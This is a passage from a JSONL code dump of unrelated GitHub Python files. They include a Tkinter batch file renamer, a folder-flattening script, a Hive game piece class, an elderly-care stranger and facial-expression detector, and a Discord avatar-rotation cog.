and concatenate them and then print it in console.\n\ndef main(usr1,usr2):\n print(usr1+usr2)\n\nif __name__ == '__main__':\n usr1 = input(\"Enter first string: \")\n usr2 = input(\"Enter second string: \")\n\n main(usr1,usr2)","repo_name":"hasuq33/My_Python_Program","sub_path":"Practical_Program/Program30.py","file_name":"Program30.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72087851047","text":"\"Batch rename script can load multiple files from a directory and adds or removes specified amount of characters to/from the beginning/end of the filename\"\n\nimport tkinter as tk\nfrom tkinter import filedialog, messagebox\nimport ntpath\nfrom utilities import *\nfrom os import rename\nfrom os.path import join\nimport xml.etree.ElementTree as ET\nfrom random import randint\n\nversion=\"v1.1 ™.G\"\n\nconfigfile=join(\"Configuration\",\"config.xml\")\nconfigtree=ET.parse(configfile)\nconfigroot=configtree.getroot()\n\noriginalX=int(configroot.find(\"OriginalX\").text)\noriginalY=int(configroot.find(\"OriginalY\").text)\nmaincolor=configroot.find(\"MainColor\").text\ntextcolor=configroot.find(\"TextColor\").text\nButtonBorderColor=configroot.find(\"ButtonBorderColor\").text\nButtonPressColor=configroot.find(\"ButtonPressColor\").text\n\n\ndef togglemode(*args):\n global RemoveFrame, AppendFrame, RemButtonB, RemButtonE, sB, IndexB, RandomB, StringB, RandomSB, SameStrEn\n remframe=[RemButtonE,RemButtonB,sB]\n appendframe=[IndexB,RandomB, StringB, RandomSB, SameStrEn]\n if str(Mode.get())==\"Remove\":\n for widget in remframe:\n widget.config(state=\"normal\")\n for widget in appendframe:\n widget.config(state=\"disabled\")\n RemoveFrame.config(bd=2)\n AppendFrame.config(bd=0)\n else:\n for widget in remframe:\n widget.config(state=\"disabled\")\n for widget in appendframe:\n widget.config(state=\"normal\")\n RemoveFrame.config(bd=0)\n AppendFrame.config(bd=2)\n\n\n\ndef scrolltables(direction):\n global InList, OutList\n for table in (InList, OutList):\n table.yview\n\n\n\n\ndef preview(*args):\n global files,newname, Mode, OutList, sB, RemoveBeginning, AppendHow, RandomSB, SameStrEn\n OutList.delete(0, \"end\")\n thismuch=sB.get()\n newname=[]\n runningindex=1\n randomnumbers=int(RandomSB.get())\n samestr=str(SameStrEn.get())\n for f in files:\n if str(Mode.get())==\"Remove\":\n if RemoveBeginning.get()==True:\n name=str(ntpath.basename(f))[int(thismuch):]\n OutList.insert(\"end\",name)\n newname.append(name)\n else:\n if int(thismuch)==0:\n name=str(ntpath.basename(f)[int(thismuch):])\n OutList.insert(\"end\", name )\n newname.append(name)\n else:\n name=str(ntpath.basename(f))[:-int(thismuch)]\n OutList.insert(\"end\", name)\n newname.append(name)\n else:\n if str(AppendHow.get())==\"Index\":\n AmountOfFiles=len(files)\n LeadingZeros=len(str(AmountOfFiles))\n name=str(runningindex).zfill(LeadingZeros)+\"_\"+str(ntpath.basename(f))\n OutList.insert(\"end\", name)\n newname.append(name)\n runningindex+=1\n elif str(AppendHow.get())==\"Random\":\n randomstring=\"\"\n for i in range(0, randomnumbers):\n UpperLower=randint(1,2)\n if UpperLower==1:\n char=randint(65,90)\n else:\n char=randint(97, 122)\n randomstring+=chr(char)\n name=randomstring+\"_\"+str(ntpath.basename(f))\n OutList.insert(\"end\",name)\n newname.append(name)\n else:\n name=samestr+\"_\"+str(ntpath.basename(f))\n OutList.insert(\"end\",name)\n newname.append(name)\n\n\n\n\n\n\n\n\n\ndef openfiles(*args):\n global InList, files, sB, doB, OutList\n InList.delete(0,\"end\")\n files=filedialog.askopenfilenames()\n longest=[]\n if len(files)==0:\n OutList.delete(0,\"end\")\n messagebox.showwarning(\"\",\"No files specified!\")\n else:\n for f in files:\n InList.insert(\"end\",ntpath.basename(f))\n longest.append(len(ntpath.basename(f)))\n sB.config(to_=Statistics.Minimum(longest))\n preview()\n doB.config(state=\"normal\")\n\ndef RenameFunc(*args):\n global files, newname, InList, OutList, doB\n directory=ntpath.dirname(files[0])\n for n in range(0,len(newname)):\n new=join(directory, newname[n])\n rename(files[n],new)\n InList.delete(0,\"end\")\n OutList.delete(0, \"end\")\n doB.config(state=\"disabled\")\n messagebox.showinfo(\"\",\"Files are renamed\")\n\n\n\nroot=tk.Tk()\nroot.title(\"Batch rename\")\nroot.geometry(\"{}x{}\".format(originalX,originalY))\nroot.configure(bg=maincolor)\n\nfiles=[]\nnewname=[]\n\n\nButtonFrame=tk.Frame(root,bg=maincolor)\nListFrame=tk.Frame(root,bg=maincolor)\nModeSelectFrame=tk.Frame(root, bg=maincolor,bd=2, relief=\"groove\")\nModesFrame=tk.Frame(root, bg=maincolor)\nRemoveFrame=tk.Frame(ModesFrame,bg=maincolor,bd=2, relief=\"sunken\")\nAppendFrame=tk.Frame(ModesFrame, bg=maincolor,bd=0, relief=\"sunken\")\nButtonFrame.grid(row=0, column=0)\nListFrame.grid(row=1, column=0)\nModeSelectFrame.grid(row=2, column=0, pady=10)\nModesFrame.grid(row=3, column=0, padx=20)\nRemoveFrame.grid(row=0, column=0, padx=10)\nAppendFrame.grid(row=0, column=1, padx=10)\n\n# ----------------------ButtonFrame\nbrowseB=tk.Button(ButtonFrame, text=\"Open files\",highlightbackground=ButtonBorderColor,activebackground=ButtonPressColor, command=openfiles)\nbrowseB.grid(row=0, column=0, padx=200, pady=10)\ndoB=tk.Button(ButtonFrame, text=\"Start\",highlightbackground=ButtonBorderColor,activebackground=ButtonPressColor, command=RenameFunc, state=\"disabled\")\ndoB.grid(row=0, column=1,padx=200)\n\n# ----------------------ListFrame\nscrollbarY = tk.Scrollbar(ListFrame, orient='vertical')\nscrollbarY.grid(row=1, column=2,sticky=\"NS\")\ntk.Label(ListFrame, text=\"Before After\",bg=maincolor,fg=textcolor).grid(row=0,column=0,columnspan=2)\nInList = tk.Listbox(ListFrame, highlightbackground=maincolor,yscrollcommand=scrollbarY.set, width=55,selectmode=\"multiple\")\nOutList = tk.Listbox(ListFrame,highlightbackground=maincolor, yscrollcommand=scrollbarY.set, width=55,selectmode=\"multiple\")\nscrollbarY.config(command=scrolltables)\nInList.grid(row=1, column=0)\nOutList.grid(row=1, column=1)\n\n# ----------------------ModeSelectFrame\nMode=tk.StringVar()\nMode.set(\"Remove\")\ntk.Label(ModeSelectFrame, text=\"Select mode\", bg=maincolor, fg=textcolor).grid(row=0, column=0)\nModeBRem=tk.Radiobutton(ModeSelectFrame,highlightbackground=maincolor,bg=maincolor,fg=textcolor, text=\"Remove characters\", variable=Mode, value=\"Remove\", command=togglemode)\nModeBApp=tk.Radiobutton(ModeSelectFrame,highlightbackground=maincolor,bg=maincolor,fg=textcolor, text=\"Append characters \", variable=Mode, value=\"Append\", command=togglemode)\nModeBRem.grid(row=1,column=0)\nModeBApp.grid(row=2,column=0)\n\n# ----------------------RemoveFrame\nspinboxMax=0\nRemoveBeginning=tk.BooleanVar()\nRemoveBeginning.set(True)\ntk.Label(RemoveFrame, text=\"Position & amount of characters to be removed\",bg=maincolor,fg=textcolor).grid(row=0,column=0, columnspan=2,pady=10)\nRemButtonB=tk.Radiobutton(RemoveFrame,highlightbackground=maincolor,bg=maincolor,fg=textcolor, text=\"Beginning\", variable=RemoveBeginning, value=True, command=preview, state=\"normal\")\nRemButtonE=tk.Radiobutton(RemoveFrame,highlightbackground=maincolor,bg=maincolor,fg=textcolor,text=\"End \", variable=RemoveBeginning, value=False,command=preview, state=\"normal\")\nRemButtonB.grid(row=1,column=0)\nRemButtonE.grid(row=2, column=0)\nsB=tk.Spinbox(RemoveFrame,highlightbackground=maincolor, width=5,from_=0,to_=0,command=preview, state=\"normal\")\nsB.grid(row=1, column=1, pady=5)\n\n# ----------------------AppendFrame\nAppendHow=tk.StringVar()\nAppendHow.set(\"Index\")\nsamestring=tk.StringVar()\nsamestring.set(\"\")\nrandomlength=tk.IntVar()\nrandomlength.set(0)\ntk.Label(AppendFrame, text=\"What to append to the beginning\",bg=maincolor,fg=textcolor).grid(row=0,column=0, columnspan=2,pady=10)\nIndexB=tk.Radiobutton(AppendFrame,highlightbackground=maincolor,bg=maincolor,fg=textcolor, text=\"Index \", variable=AppendHow, value=\"Index\", command=preview, state=\"disabled\")\nRandomB=tk.Radiobutton(AppendFrame,highlightbackground=maincolor,bg=maincolor,fg=textcolor, text=\"Random\", variable=AppendHow, value=\"Random\", command=preview, state=\"disabled\")\nStringB=tk.Radiobutton(AppendFrame,highlightbackground=maincolor,bg=maincolor,fg=textcolor, text=\"String \", variable=AppendHow, value=\"String\", command=preview, state=\"disabled\")\nRandomSB=tk.Spinbox(AppendFrame,highlightbackground=maincolor, width=3,from_=1,to_=100,command=preview, state=\"disabled\")\nSameStrEn=tk.Entry(AppendFrame, textvariable=samestring, width=10, state=\"disabled\")\nSameStrEn.bind(\"\",preview)\nIndexB.grid(row=1, column=0)\nRandomB.grid(row=2, column=0)\nRandomSB.grid(row=2, column=1)\nStringB.grid(row=3, column=0)\nSameStrEn.grid(row=3, column=1, pady=5)\n\n\n\ntk.Label(root, text=version,bg=maincolor,fg=textcolor).grid(row=0, column=0,sticky=\"NW\")\nroot.mainloop()","repo_name":"tmg1991/Python","sub_path":"Batch_rename/Batch_rename_v1.1.py","file_name":"Batch_rename_v1.1.py","file_ext":"py","file_size_in_byte":8982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5717362247","text":"import os, shutil, logging\nlogging.basicConfig(level=logging.DEBUG)\n\n###########################################################################\n## Commission: reorder all files in nested folders to a top level directory\n## preserving the original name plus origianl folder name as prefix.\n##\n##\n## Python 3.6 on Windows.\n## Autor: Martin Eías Iglesias - 2020\n###########################################################################\n\nos.system('cls' if os.name == 'nt' else 'clear')\ninital_warning = input(\"\\nThese program will reorder and move all files in these folder and nested sub-folders to a new ordered-folder with a posfix name added.\\nDo you want to continue?\\nHit 'Enter key' to continue or type 'N' to cancel:\\n\" ) or True\n\ncwd_name = os.path.basename(os.getcwd())\nposfix_folder = \"_ordenados\"\nnew_dest_folder = f\"{os.path.dirname(__file__)}\\\\{cwd_name}{posfix_folder}\"\n\n\ndef get_items_list(base_path):\n # Find files into folders and subfolders.\n items_in_folders = []\n # Message from user when he reject the initial prompt.\n if inital_warning is not True:\n logging.info(\"\\n\"*2+\" You choose cancel.\\nThat program will be stopped and nothing will happen with your files.\\nbye!\\n\\n\")\n exit()\n\n # Say to the user where is the root folder.\n logging.info('\\n'+f\"Start working from {cwd_name}\")\n def recursive_scan_folders(base_path):\n # Recursive start to find files.\n with os.scandir(base_path) as folder:\n if folder is not None:\n for content in folder:\n currentpath = os.path.dirname(content)\n if content.is_file() and content.name != os.path.basename(__file__):\n dirname = os.path.dirname(content).rsplit(\"\\\\\")[-1]\n items_in_folders.append(f'{dirname}_{content.name}')\n new_file_name = f'{dirname}_{content.name}'\n # Create a folder where to files will be copy in order.\n os.makedirs(new_dest_folder, exist_ok=True)\n if posfix_folder not in str(dirname):\n shutil.copy(f\"{currentpath}\\\\{content.name}\", f\"{os.path.abspath(new_dest_folder)}\\\\{new_file_name}\") # Move files from this folder to top root folder.\n elif content.is_dir():\n logging.info(\"\\t\"f'{content.name} It is a folder and not will be reordered.')\n yield from recursive_scan_folders(content.path)\n else:\n logging.info('Sorry! \\n No files or foldes in this path')\n\n for i in recursive_scan_folders(base_path):\n next(recursive_scan_folders(i.path))\n\n return items_in_folders\n\nif __name__ == '__main__':\n logging.info('\\n'+f\"Files ordered are: {get_items_list(os.getcwd())}\"+\"\\n\"+f\"on the new folder named: {new_dest_folder}\")","repo_name":"martinvfx/Reorder_Nested_Files","sub_path":"ReaorderNestedFiles.py","file_name":"ReaorderNestedFiles.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9610367950","text":"from Piece import Piece\nclass Grasshopper(Piece):\n def get_neighbors(self, x, y , piece):\n neighbors = []\n n = self.Board.ground[x - 2][y]\n s = self.Board.ground[x + 2][y]\n n_w = self.Board.ground[x - 1][y - 1]\n n_e = self.Board.ground[x - 1][y + 1]\n s_w = self.Board.ground[x + 1][y - 1]\n s_e = self.Board.ground[x + 1][y + 1]\n neighbors.append((x - 2, y))\n neighbors.append((x + 2, y))\n neighbors.append((x - 1, y - 1))\n neighbors.append((x - 1, y + 1))\n neighbors.append((x + 1, y - 1))\n neighbors.append((x + 1, y + 1))\n return neighbors\n def movements(self , x , y ):\n output = set()\n n_e = self.get_ne()\n if n_e:\n destenation = n_e.get_ne()\n while destenation:\n n_e = destenation\n destenation = n_e.get_ne()\n if n_e!= \"ERROR\":\n output.add(n_e.get_ne_pos())\n n_w = self.get_nw()\n if n_w:\n destenation = n_w.get_nw()\n while destenation:\n n_w = destenation\n destenation = n_w.get_nw()\n if n_w!= \"none\":\n output.add(n_w.get_nw_pos())\n s_e = self.get_se()\n if s_e:\n destenation = s_e.get_se()\n while destenation:\n s_e = destenation\n destenation = s_e.get_se()\n if s_e!= \"none\":\n output.add(n_e.get_se_pos())\n s_w = self.get_sw()\n if s_w:\n destenation = s_w.get_sw()\n while destenation:\n s_w = destenation\n destenation = s_w.get_sw()\n if s_w!= \"none\":\n output.add(s_w.get_sw_pos())\n n = self.get_n()\n if n:\n destenation = n.get_n()\n while destenation:\n n = destenation\n destenation = n.get_n()\n if n!= \"none\":\n output.add(n.get_n_pos())\n s = self.get_s()\n if s:\n destenation = s.get_s()\n while destenation:\n s = destenation\n destenation = s.get_s()\n if s!= \"none\":\n output.add(s.get_s_pos())\n return output\n def get_n(self):\n if 0 <= self.pos['x'] - 2 < self.Board.columns * 2 and 0 <= self.pos['y'] < self.Board.rows * 2:\n return self.Board.ground[self.pos[\"x\"] - 2][self.pos[\"y\"]]\n return \"none\"\n\n def get_s(self):\n if 0 <= self.pos['x'] + 2 < self.Board.columns *+ 2 < self.Board.columns * 2 and 0 <= self.pos['y'] < self.Board.rows * 2 :\n return self.Board.ground[self.pos[\"x\"] + 2][self.pos[\"y\"]]\n return \"none\"\n\n def get_nw(self):\n if 0 <= self.pos['x']- 1 < self.Board.columns * 2 and 0 <= self.pos['y']-1 < self.Board.rows * 2:\n return self.Board.ground[self.pos[\"x\"] - 1][self.pos[\"y\"] - 1]\n return \"none\"\n\n def get_ne(self):\n if 0 <= self.pos['x']- 1 < self.Board.columns * 2 and 0 <= self.pos['y']+ 1 < self.Board.rows * 2 :\n return self.Board.ground[self.pos[\"x\"] - 1][self.pos[\"y\"] + 1]\n return \"none\"\n\n def get_sw(self):\n if 0 <= self.pos['x'] + 1 < self.Board.columns * 2 and 0 <= self.pos['y'] - 1 < self.Board.rows * 2 :\n return self.Board.ground[self.pos[\"x\"] + 1][self.pos[\"y\"] - 1]\n return \"none\"\n\n def get_se(self):\n if 0 <= self.pos['x']+ 1 < self.Board.columns * 2 and 0 <= self.pos['y'] + 1 < self.Board.rows * 2 :\n return self.Board.ground[self.pos[\"x\"] + 1][self.pos[\"y\"] + 1]\n return \"none\"\n def get_n_pos(self):\n return self.pos[\"x\"] - 2, self.pos[\"y\"]\n\n def get_s_pos(self):\n return self.pos[\"x\"] + 2, self.pos[\"y\"]\n\n def get_nw_pos(self):\n return self.pos[\"x\"] - 1, self.pos[\"y\"] - 1\n\n def get_ne_pos(self):\n return self.pos[\"x\"] - 1, self.pos[\"y\"] + 1\n\n def get_sw_pos(self):\n return self.pos[\"x\"] + 1, self.pos[\"y\"] - 1\n\n def get_se_pos(self):\n return self.pos[\"x\"] + 1, self.pos[\"y\"] + 1","repo_name":"HannaParsa/Hive_Game","sub_path":"Grasshopper.py","file_name":"Grasshopper.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17431873884","text":"# -*- coding: utf-8 -*-\n\"\"\"\n陌生人识别模型和表情识别模型的结合的主程序\n\n用法:\npython emotion.py\npython emotion.py --filename tests/room_01.mp4\n\"\"\"\n\n# 导入包\nimport argparse\nfrom oldcare.facial import FaceUtil\nfrom PIL import Image, ImageDraw, ImageFont\nfrom oldcare.utils import fileassistant\nfrom keras.models import load_model\nfrom keras.preprocessing.image import img_to_array\nimport cv2\nimport time\nimport numpy as np\nimport os\nimport imutils\nimport subprocess\n\n\n# # 得到当前时间\n# current_time = time.strftime('%Y-%m-%d %H:%M:%S',\n# time.localtime(time.time()))\n# print('[INFO] %s 陌生人检测程序和表情检测程序启动了.' % current_time)\n\n# 传入参数\n# ap = argparse.ArgumentParser()\n# ap.add_argument(\"-f\", \"--filename\", required=False, default='',\n# help=\"\")\n# args = vars(ap.parse_args())\n# input_video = args['filename']\n\nclass Emotion_check:\n def __init__(self):\n self.facial_recognition_model_path = 'models/face_recognition_hog.pickle'\n self.facial_expression_model_path = 'models/miniGOOGLE_emotion_100_7.hdf5'\n\n self.output_stranger_path = 'supervision/strangers'\n self.output_smile_path = 'supervision/smile'\n\n self.people_info_path = 'info/people_info.csv'\n self.facial_expression_info_path = 'info/facial_expression_info.csv'\n # your python path\n self.python_path = 'C:/Users/whg/anaconda3/envs/tf/python'\n\n self.FACIAL_EXPRESSION_TARGET_WIDTH = 28\n self.FACIAL_EXPRESSION_TARGET_HEIGHT = 28\n\n self.VIDEO_WIDTH = 640\n self.VIDEO_HEIGHT = 480\n\n self.ANGLE = 20\n\n self.current_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n\n # 得到 ID->姓名的map 、 ID->职位类型的map、\n # 摄像头ID->摄像头名字的map、表情ID->表情名字的map\n self.id_card_to_name, self.id_card_to_type = fileassistant.get_people_info(\n self.people_info_path)\n self.facial_expression_id_to_name = fileassistant.get_facial_expression_info(\n self.facial_expression_info_path)\n\n # 控制陌生人检测\n self.strangers_timing = 0 # 计时开始\n self.strangers_start_time = 0 # 开始时间\n self.strangers_limit_time = 2 # if >= 2 seconds, then he/she is a stranger.\n\n # 控制微笑检测\n self.facial_expression_timing = 0 # 计时开始\n self.facial_expression_start_time = 0 # 开始时间\n self.facial_expression_limit_time = 2 # if >= 2 seconds, he/she is smiling\n\n # 初始化人脸识别模型\n self.faceutil = FaceUtil(self.facial_recognition_model_path)\n self.facial_expression_model = load_model(self.facial_expression_model_path)\n\n self.counter = 0\n\n def check_stranger_and_emotion(self, frame):\n self.counter += 1\n\n frame = imutils.resize(frame, width=self.VIDEO_WIDTH, height=self.VIDEO_HEIGHT) # 压缩,加快识别速度\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # grayscale,表情识别\n face_location_list, names = self.faceutil.get_face_location_and_name(frame)\n\n # 得到画面的四分之一位置和四分之三位置,并垂直划线\n one_fourth_image_center = (int(self.VIDEO_WIDTH / 4),\n int(self.VIDEO_HEIGHT / 4))\n three_fourth_image_center = (int(self.VIDEO_WIDTH / 4 * 3),\n int(self.VIDEO_HEIGHT / 4 * 3))\n\n cv2.line(frame, (one_fourth_image_center[0], 0),\n (one_fourth_image_center[0], self.VIDEO_HEIGHT),\n (0, 255, 255), 1)\n cv2.line(frame, (three_fourth_image_center[0], 0),\n (three_fourth_image_center[0], self.VIDEO_HEIGHT),\n (0, 255, 255), 1)\n\n # 处理每一张识别到的人脸\n for ((left, top, right, bottom), name) in zip(face_location_list,\n names):\n\n # 将人脸框出来\n rectangle_color = (0, 0, 255)\n if self.id_card_to_type[name] == 'old_people':\n rectangle_color = (0, 0, 128)\n elif self.id_card_to_type[name] == 'employee':\n rectangle_color = (255, 0, 0)\n elif self.id_card_to_type[name] == 'volunteer':\n rectangle_color = (0, 255, 0)\n else:\n pass\n cv2.rectangle(frame, (left, top), (right, bottom),\n rectangle_color, 2)\n\n # 陌生人检测逻辑\n if 'Unknown' in names: # alert\n if self.strangers_timing == 0: # just start timing\n self.strangers_timing = 1\n self.strangers_start_time = time.time()\n else: # already started timing\n strangers_end_time = time.time()\n difference = strangers_end_time - self.strangers_start_time\n\n self.current_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n\n if difference > self.strangers_limit_time:\n event_desc = '陌生人出现!!!'\n event_location = '房间'\n print('[EVENT] %s, 房间, 陌生人出现!!!' % self.current_time)\n cv2.imwrite(os.path.join(self.output_stranger_path,\n 'snapshot_%s.jpg' % (time.strftime('%Y%m%d_%H%M%S'))),\n frame) # snapshot\n\n # insert into database\n command = '%s inserting.py --event_desc %s --event_type 2 --event_location %s' % (\n self.python_path, event_desc, event_location)\n p = subprocess.Popen(command, shell=True)\n\n # 开始陌生人追踪\n unknown_face_center = (int((right + left) / 2),\n int((top + bottom) / 2))\n\n cv2.circle(frame, (unknown_face_center[0],\n unknown_face_center[1]), 4, (0, 255, 0), -1)\n\n direction = ''\n # face locates too left, servo need to turn right,\n # so that face turn right as well\n if unknown_face_center[0] < one_fourth_image_center[0]:\n direction = 'right'\n elif unknown_face_center[0] > three_fourth_image_center[0]:\n direction = 'left'\n\n # adjust to servo\n if direction:\n print('%d-摄像头需要 turn %s %d 度' % (self.counter,\n direction, self.ANGLE))\n\n else: # everything is ok\n self.strangers_timing = 0\n\n # 表情检测逻辑\n # 如果不是陌生人,且对象是老人\n if name != 'Unknown' and self.id_card_to_type[name] == 'old_people':\n # 表情检测逻辑\n roi = gray[top:bottom, left:right]\n roi = cv2.resize(roi, (self.FACIAL_EXPRESSION_TARGET_WIDTH,\n self.FACIAL_EXPRESSION_TARGET_HEIGHT))\n roi = roi.astype(\"float\") / 255.0\n roi = img_to_array(roi)\n roi = np.expand_dims(roi, axis=0)\n\n # determine facial expression\n arr = list(self.facial_expression_model.predict(roi)[0])\n labels = ['anger', 'disgust', 'fear', 'happy', 'normal', 'sad', 'surprised']\n max_prediction = max(arr)\n index = arr.index(max_prediction)\n if index == -1:\n facial_expression_label = labels[4]\n else:\n facial_expression_label = labels[index]\n\n if facial_expression_label == 'happy': # alert\n if self.facial_expression_timing == 0: # just start timing\n self.facial_expression_timing = 1\n self.facial_expression_start_time = time.time()\n else: # already started timing\n facial_expression_end_time = time.time()\n difference = facial_expression_end_time - self.facial_expression_start_time\n\n self.current_time = time.strftime('%Y-%m-%d %H:%M:%S',\n time.localtime(time.time()))\n if difference < self.facial_expression_limit_time:\n print(\n '[INFO] %s, 房间, %s仅笑了 %.1f 秒. 忽略.' % (\n self.current_time, self.id_card_to_name[name], difference))\n else: # he/she is really smiling\n event_desc = '%s正在笑' % (self.id_card_to_name[name])\n event_location = '房间'\n print('[EVENT] %s, 房间, %s正在笑.' % (self.current_time, self.id_card_to_name[name]))\n cv2.imwrite(os.path.join(self.output_smile_path,\n 'snapshot_%s.jpg' % (time.strftime('%Y%m%d_%H%M%S'))),\n frame) # snapshot\n\n # insert into database\n command = '%s inserting.py --event_desc %s --event_type 0 --event_location %s --old_people_id %d' % (\n self.python_path, event_desc, event_location, int(name))\n p = subprocess.Popen(command, shell=True)\n\n else: # everything is ok\n self.facial_expression_timing = 0\n\n else: # 如果是陌生人,则不检测表情\n facial_expression_label = ''\n\n # 人脸识别和表情识别都结束后,把表情和人名写上\n # (同时处理中文显示问题)\n img_PIL = Image.fromarray(cv2.cvtColor(frame,\n cv2.COLOR_BGR2RGB))\n\n draw = ImageDraw.Draw(img_PIL)\n final_label = self.id_card_to_name[name] + ': ' + self.facial_expression_id_to_name[\n facial_expression_label] if facial_expression_label else self.id_card_to_name[name]\n draw.text((left, top - 30), final_label,\n font=ImageFont.truetype(\"C:\\\\Windows\\\\Fonts\\\\SIMLI.TTF\", 30),\n fill=(255, 0, 0)) # windows\n\n # 转换回OpenCV格式\n frame = cv2.cvtColor(np.asarray(img_PIL), cv2.COLOR_RGB2BGR)\n\n return frame\n","repo_name":"huijieXue1020/CVpart","sub_path":"checkingstrangersandfacialexpression.py","file_name":"checkingstrangersandfacialexpression.py","file_ext":"py","file_size_in_byte":10934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21068148525","text":"import discord\r\nfrom discord.ext import commands, tasks\r\nfrom discord.ext.commands import Cog as cog\r\nfrom discord.ext.commands import command as cmd\r\nimport json\r\nimport random\r\nimport asyncio\r\nimport aiohttp\r\nimport re\r\nimport datetime as dt\r\n\r\ntry:\r\n import humanize\r\nexcept ImportError:\r\n humanize = None\r\n\r\nclass avatar_rotator(cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.pfp_rotator.start()\r\n print(\"pfp.py has been loaded\")\r\n\r\n def cog_unload(self):\r\n self.pfp_rotator.cancel()\r\n\r\n @cmd(aliases=['copy'])\r\n async def steal(self, ctx, u: str = None):\r\n \"\"\"\r\n Copy someone else pfp and make it yours. You can also steal someone else avatar outside server by using their user ID\r\n\r\n You can use either their username#discrim, username, or nickname. You must be in same server as the target in for this to work. Using user ID is more recommended\r\n\r\n This command is case sensitive. If you mistyped one case letter, this will return error\r\n \"\"\"\r\n def get_password():\r\n with open('config/password', 'r') as f:\r\n password = f.readline()\r\n\r\n return password\r\n\r\n if not u:\r\n return await ctx.send(\"No target, try use username or user ID\")\r\n\t\t\t\r\n # This will check if you're using either user ID or by their username/nickname\r\n regex = re.match(r\"[0-9]{18}\", u)\r\n \r\n if not regex:\r\n # Try search member by using either username, or nickname otherwise return error NotFound\r\n try:\r\n u = await commands.MemberConverter().convert(ctx, u)\r\n except commands.BadArgument:\r\n return await ctx.send(\"member not found\")\r\n else:\r\n try:\r\n u = await self.bot.fetch_user(int(u))\r\n except discord.NotFound:\r\n return await ctx.send(\"user not found, perhaps you're using wrong ID?\")\r\n \r\n async with aiohttp.ClientSession() as cs: \r\n async with cs.get(str(u.avatar_url)) as r:\r\n av = await r.read()\r\n await self.bot.user.edit(avatar=av, password=get_password())\r\n self.bot.variables_last_link = av\r\n\r\n await ctx.message.add_reaction('☑️')\r\n\r\n @cmd(aliases=['setting', 'settings'])\r\n async def config(self, ctx: commands.Context, option, *, setting):\r\n \"\"\"\r\n Changes configuration files\r\n Available options\r\n cycle : change cycling style\r\n interval : how often it should change\r\n\r\n Settings format\r\n cycle : random | cycle\r\n interval : time format is 0d0h0m0s. For example, 6h for 6 hours\r\n \"\"\"\r\n\r\n # a simple time converter by using str.split to get and calculate the number\r\n def time_converter(time_string):\r\n if time_string.isdigit() == True:\r\n return time_string\r\n\r\n the_time = time_string\r\n total_seconds = 0\r\n\r\n if str(the_time).lower().find(\"d\") != -1:\r\n split, original_time = str(the_time).split(\"d\")\r\n days_to_seconds = int(split) * 86400\r\n total_seconds = total_seconds + int(days_to_seconds)\r\n the_time = original_time\r\n\r\n if str(the_time).lower().find(\"h\") != -1:\r\n split, original_time = str(the_time).split(\"h\")\r\n hours_to_seconds = int(split) * 3600\r\n total_seconds = total_seconds + int(hours_to_seconds)\r\n the_time = original_time\r\n\r\n if str(the_time).lower().find(\"m\") != -1:\r\n split, original_time = str(the_time).split(\"m\")\r\n minute_to_seconds = int(split) * 60\r\n total_seconds = total_seconds + int(minute_to_seconds)\r\n the_time = original_time\r\n\r\n if str(the_time).lower().find(\"s\") != -1:\r\n split, original_time = str(the_time).split(\"s\")\r\n seconds_to_second_lol = int(split) * 1\r\n total_seconds = total_seconds + int(seconds_to_second_lol)\r\n the_time = original_time\r\n\r\n return total_seconds\r\n\r\n # check if setting has available options, otherwise success return false\r\n def cycle_set(setting):\r\n success = False\r\n\r\n with open('config/config.json', 'r') as f:\r\n config = json.load(f)\r\n\r\n if setting.lower() == \"random\":\r\n config['cycling style'] = setting\r\n\r\n with open('config/config.json', 'w') as f:\r\n json.dump(config, f, indent=4)\r\n\r\n success = True\r\n return success\r\n\r\n elif setting.lower() == \"cycle\":\r\n config['cycling style'] = setting\r\n\r\n with open('config/config.json', 'w') as f:\r\n json.dump(config, f, indent=4)\r\n\r\n success = True\r\n return success\r\n\r\n else:\r\n return success\r\n\r\n def interval_set(time_string):\r\n seconds = time_converter(time_string)\r\n\r\n if seconds == 0:\r\n return seconds\r\n\r\n with open('config/config.json', 'r') as f:\r\n config = json.load(f)\r\n\r\n config['interval'] = seconds\r\n\r\n with open('config/config.json', 'w') as f:\r\n json.dump(config, f, indent=4)\r\n\r\n return seconds\r\n\r\n if option.lower() == 'cycle':\r\n success = cycle_set(setting)\r\n if success == False:\r\n await ctx.send(\"Invalid setting provided, this setting only accept `random` or `cycle`\")\r\n else:\r\n await ctx.send(f\"☑️\")\r\n elif option.lower() == 'interval':\r\n seconds = interval_set(setting)\r\n\r\n if seconds == 0:\r\n await ctx.send(\"you can't set interval at 0 second\")\r\n return\r\n\r\n if humanize:\r\n delta = dt.timedelta(seconds=seconds)\r\n await ctx.send(f\"successfully changed interval to {humanize.precisedelta(delta)}\")\r\n else:\r\n await ctx.send(f\"successfully changed interval\")\r\n else:\r\n await ctx.send(\"There is no such option, available options: `cycle` `interval`\")\r\n\r\n @config.error\r\n async def config_error(self, ctx: commands.Context, error):\r\n if isinstance(error, commands.MissingRequiredArgument):\r\n await ctx.send(error)\r\n\r\n @cmd(aliases=['av', 'pfp'])\r\n async def avatar(self, ctx, *, target = \"\"):\r\n \"\"\"Obtain someone else avatar in maximum resolution, also works if user didn't share mutual servers with the bot but ID is required for this to work\r\n For mass avatar, use multiple IDs, separate by space\r\n \"\"\"\r\n def to_jpg(user):\r\n url = user.avatar_url_as(format=\"jpg\", size=4096)\r\n return url\r\n\r\n def to_png(user):\r\n url = user.avatar_url_as(format=\"png\", size=4096)\r\n return url\r\n\r\n def to_webp(user):\r\n url = user.avatar_url_as(format=\"webp\", size=4096)\r\n return url\r\n\r\n def to_gif(user):\r\n if user.is_avatar_animated() == True:\r\n url = user.avatar_url_as(format=\"gif\", size=4096)\r\n text = f\" | [GIF]({url})\"\r\n return text\r\n else:\r\n not_animated = 